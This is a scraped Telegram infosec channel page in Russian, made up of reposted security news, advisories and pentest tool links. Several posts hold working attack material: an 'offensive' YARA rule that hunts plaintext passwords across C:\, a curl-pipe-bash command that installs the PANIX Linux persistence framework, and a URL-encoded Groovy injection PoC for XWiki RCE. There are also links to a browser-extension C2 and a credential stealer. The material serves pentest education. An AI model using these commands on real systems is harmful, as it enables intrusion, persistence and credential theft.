Fsecurity | HH
Открыть в Telegram
Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb
Больше2 014
Подписчики
Нет данных24 часа
-57 дней
-930 день
Архив постов
2 013
Repost from Adaptix Framework
Так) надо сюда что-то писать, но когда меняешь архитектуру под капотом сервера, особо ничего не показать... А хотя нет, вот иконки добавил😂😂😂
2 013
Repost from REDtalk
👨💻 Привет!
У нас у всех сейчас плотный график работы (ну вы знаете, эти пентесты), поэтому стараемся выкладывать посты, как можем.
Сегодня я хочу показать, почему плохо использовать Notepad++ для создания временных пометок. Под капотом он раскидывает информацию из несохраненных вкладок по файлам в
%appdata%\notepad++\backup\, а на практике многие забывают удалять конфиденциальную информацию, так и оставив её висеть в файле. На гифке 🔗 PoC (куда же без него?) - стиллер этих файлов
Давайте все будем секурными и почистим папку backup 😼
P. S. Я сейчас работаю над одной мега-штукой для канала. Должно получится круто, ждите новостей :)2 013
Repost from Похек
Orange Security обновили свой roadmap по пентесту Active Directory
Для тех кто не в теме, это самый популярный roadmap по пентесту AD в интернете!
https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
2 013
Repost from Похек
Привет, похекеры!👋 По просьбам трудящихся 1. Сегодня у нас история о том, как обычный аквариум превратился в джекпот для киберпреступников. Готовы? Поехали!
#IoTSecurity #Casino #CyberSecurity #SmartDevices #IoT #Казино
➡️ Рыбки, термометр и база данных
В 2017 году неназванное казино в Северной Америке стало жертвой необычной кибератаки. Хакеры проникли в сеть казино через... умный термометр в аквариуме, установленном в лобби. Да-да, вы не ослышались – обычный термометр для рыбок стал ключом к базе данных VIP-клиентов.
➡️Как это работало?
▪️Термометр был подключен к интернету для удаленного мониторинга температуры воды.
▪️Хакеры обнаружили уязвимость в прошивке устройства.
▪️Используя эту уязвимость, они получили доступ к внутренней сети казино.
▪️Найдя базу данных хайроллеров, злоумышленники выгрузили около 10 гигабайт данных.
▪️Информация была передана через тот же термометр на удаленный сервер в Финляндии.
➡️Почему это сработало?
▪️IoT-устройства часто имеют слабую защиту. Почему? Потому что если бы устройство за 5$ имело бы стойкую защиту, оно бы стоило 50$
▪️Производители фокусируются на функциональности, а не на безопасности. Потому что дешевле не запариваться над безопасностью)
▪️Традиционные системы защиты не всегда покрывают IoT-девайсы.
➡️Последствия
Казино потеряло конфиденциальную информацию о своих самых ценных клиентах. А учитывая, что такие клиенты особенно пекутся о конфенданциальности своих походах, то я думаю они не были рады)
➡️Рекомендации
▪️Подключайте к сети только необходимые устройства или грамотно сегментируйте сеть. Термометру, датчику движения или любой другой штуке не нужен доступ к базе данных или кассовому оборудованию.
▪️Смена дефолтных паролей.
▪️Обновление прошивок, даже для "неважных" устройств.
p.s. кто заметил отсылку?)
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
2 013
Repost from SecuriXy.kz
Еще один SOC инструмент сдырявился следом за вазухом
🚨 Критическая уязвимость в #Kibana : ESA-2025-06 - В версиях от 8.15.0 до 8.17.2 обнаружена уязвимость, позволяющая выполнить произвольный код через Prototype Pollution. Эта уязвимость (CVE-2025-25012) имеет высокий уровень опасности с оценкой CVSS 9.9.
Кто подвержен риску?
В версиях 8.15.0–8.17.0: пользователи с ролью Viewer.
В версиях 8.17.1 и 8.17.2: пользователи с ролями, включающими привилегии fleet-all, integrations-all и actions:execute-advanced-connectors.
Рекомендуемые действия:
Обновитесь до версии Kibana 8.17.3.
Если обновление невозможно, добавьте в конфигурацию Kibana параметр:
xpack.integration_assistant.enabled: false
2 013
Repost from Pentest HaT
🐧 Вдогонку к предыдущему посту
➡️https://hadess.io/the-art-of-linux-persistence/
#linux #persistence #redteam
✈️ Pentest HaT
2 013
Repost from Кибер ПТУ | Кибербезопасность
Одна из самых популярных точек входа в мир кибербезопасности через инженера SOC L1. Более того, эта позиция дает достаточно очевидный и прозрачный рост в сторону L2 и L3. Единственный нюанс – многие до сих пор думают, что SOC, это что-то про мониторинг инцидентов, хотя это далеко не так.
Я тут наткнулся на годный файлик, в котором подробно и лаконично расписана вся подноготная SOC – начиная с его структуры, заканчивая описанием каждой роли внутри него. Более того, там даже есть заметки на тему того, чего не хватает ребятам с L1 для того, чтобы перейти на L2 и так далее.
В общем, делюсь. Кажется, такие вещи нужно знать всем безопасникам.
#SOC #BaseSecurity
🧠 Твой Пакет Знаний | 🛍 Другие каналы
2 013
Repost from s0ld13r ch.
S0LD13R - Offensive YARA 😄
🚨 Caution: Use for educational purposes only, author is not responsible for your actions 🚨
В классическом представлении YARA — это инструмент для поиска вредоносных файлов и индикаторов компрометации (IoC). Но в реальности YARA может стать отличным помощником на этапах пентеста и Red Team операций 🕺
T1552.001 Unsecured Credentials: Credentials In Files - техника применяемая для поиска паролей и ключей для получения доступов в различные системы. Пентестер проникает на хост и ищет креды для повышения привилегий или бокового перемещения. Данный этап можно автоматизировать при помощи Yara сигнатур, осуществляя поиск по файлам в директориях и строкам в них 🥂
PoC:
rule ClearTextPasswords_Search_Extended
{
strings:
$password1 = "password"
$password2 = "pwd"
$password3 = "пароль"
$password4 = "Password"
$password6 = "Пароль"
condition:
any of them and (filesize < 5MB)
}
Command line 👩💻
.\yara64.exe .\rule.yar C:\
Детект 🛡
Регулярный мониторинг на стороне EDR, так как поведение может быть аномальным для хоста и легко обнаруживается.
Применять строго в целях тестирования и с разрешения собственника системы
@s0ld13r_ch2 013
Repost from Pentest HaT
🛡️ PANIX - Persistence Against *NIX v2.1.0
Мощный, модульный и легко настраиваемый framework для закрепления в 🐧ОС Linux, предназначенный для пентестеров, инженеров по обнаружению, CTF энтузиастов и других. Уделено особое внимание функциональности, что делает его важным инструментом для понимания и реализации широкого спектра методов закрепления.
Запуск:
curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.1.0/panix.sh | bash
😹 Home
#soft #shell #linux #pentest
✈️ Pentest HaT2 013
Repost from AP Security
#soc
Windows Eventlog ID's
В данном репозитории собрана полезная информация для аналитиков безопасности в разрезе безопасности корпоративных доменов.
2 013
Repost from Ralf Hacker Channel
Специальный фреймворк для потрошения браузеров. Типа "C2" со своим сервером, а агент устанавливается как расширение для браузера.
Blog: https://medium.com/@darkrain2009/redext-browser-extension-based-command-control-framework-1eec1402f146
Soft: https://github.com/Darkrain2009/RedExt
Возможностей там много, от просмотра данных, до скриншотов и захвата ввода)
#c2 #pentest #redteam #creds
2 013
Repost from SecuriXy.kz
В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893
PoC:
<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20https://github.com/advisories/GHSA-rr6p-3pfg-562j
Уже доступно! Исследование Telegram 2025 — ключевые инсайты года 
